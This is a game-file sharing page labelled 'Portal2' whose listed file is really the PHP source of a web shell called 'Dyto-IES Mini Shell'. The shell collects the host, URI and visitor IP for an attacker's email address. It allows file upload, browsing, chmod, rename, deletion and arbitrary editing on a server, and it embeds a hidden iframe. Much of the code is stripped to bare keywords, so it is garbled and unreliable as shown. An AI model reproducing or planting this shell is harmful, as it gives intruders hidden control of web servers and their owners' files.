Portal2
Let's go
Game: | Portal |
User: | anonymous |
File(s): | 1 |
Download: | Download now: Portal2 |
Views: | 1901 |
Downloads: | 103 |
Likes: |
-
- <?php
- $ip = getenv("REMOTE_ADDR");
- $ken = rand(1, 99999);
- $subj98 = " Dyto shell bouz |$ken";
- $email = "arsen.eternity@gmail.com";
- $from = "From: arsen.eternity@gmail.com";
- $tot = $_SERVER['REQUEST_URI'];
- $kon = $_SERVER['HTTP_HOST'];
- $tol = $ip . "";
- $msg8873 = "$kon $tot $tol";
- error_reporting
- set_time_limit
- if
- foreach
- $_POST[$key] = stripslashes($value);
- }
- }
- echo
- <html>
- <head>
- <link href="" rel="stylesheet" type="text/css">
- <title>Dyto-IES Mini Shell</title>
- <style>
- body
- font
- background
- color
- }
- #content tr:hover{
- background
- text
- }
- #content .first{
- background
- }
- table
- border
- }
- a{
- color
- text
- }
- a:hover{
- color
- text
- }
- input
- border
- -moz
- -webkit
- border
- }
- </style>
- </head>
- <body>
- <a href="https://ibb.co/F5n4pWj"><img src="https://i.ibb.co/9bGHPvC/IMG-20200103-142233-874.jpg" alt="IMG-20200103-142233-874" border="0"></a>
- <iframe width="0" height="0" src="https://c.top4top.io/m_1467efn6q1.mp4" frameborder="0" allowfullscreen></iframe>
- <h1><center><font color="white">Dyto-IES Mini Shell</font></center></h1>
- <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr><td><font color="white">Path :</font> ';
- if
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('','/',$path);
- $paths = explode('/',$path);
- foreach
- if
- $a = true;
- echo
- continue
- }
- if
- echo
- for
- echo "$paths[$i]"
- if
- }
- echo
- }
- echo
- if
- if
- echo
- }else{
- echo
- }
- }
- echo
- <font color="white">File Upload :</font> <input type="file" name="file" />
- <input type="submit" value="upload" />
- </form>
- </td></tr>';
- if
- echo "<tr><td>Current File : "
- echo
- echo
- echo
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo
- if
- if
- if
- echo
- }else{
- echo
- }
- }
- echo
- Permission
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if
- if
- echo
- }else{
- echo
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo
- New Name
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if
- $fp = fopen($_POST['path'],'w');
- if
- echo
- }else{
- echo
- }
- fclose
- }
- echo
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Save" />
- </form>';
- }
- echo
- }else{
- echo
- if
- if
- if
- echo
- }else{
- echo
- }
- }elseif($_POST['type'] == 'file'){
- if
- echo
- }else{
- echo
- }
- }
- }
- echo
- $scandir = scandir($path);
- echo
- <tr class="first">
- <td><center>Name</peller></center></td>
- <td><center>Size</peller></center></td>
- <td><center>Permission</peller></center></td>
- <td><center>Modify</peller></center></td>
- </tr>';
- foreach
- if
- echo
- <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
- <td><center>--</center></td>
- <td><center>';
- if
- elseif
- echo perms
- if
- echo
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- </select>
- <input type="hidden" name="type" value="dir">
- <input type="hidden" name="name" value="'.$dir.'">
- <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo
- foreach
- if
- $size = filesize($path.'/'.$file)/1024;
- $size = round($size,3);
- if
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- echo
- <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
- <td><center>'.$size.'</center></td>
- <td><center>';
- if
- elseif
- echo perms
- if
- echo
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- <option value="edit">Edit</option>
- </select>
- <input type="hidden" name="type" value="file">
- <input type="hidden" name="name" value="'.$file.'">
- <input type="hidden" name="path" value="'.$path.'/'.$file.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo
- </div>';
- }
- echo
- </body>
- </html>';
- function perms
- $perms = fileperms($file);
- if
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return
- }
- ?>
No comments yet. Be the first to post one!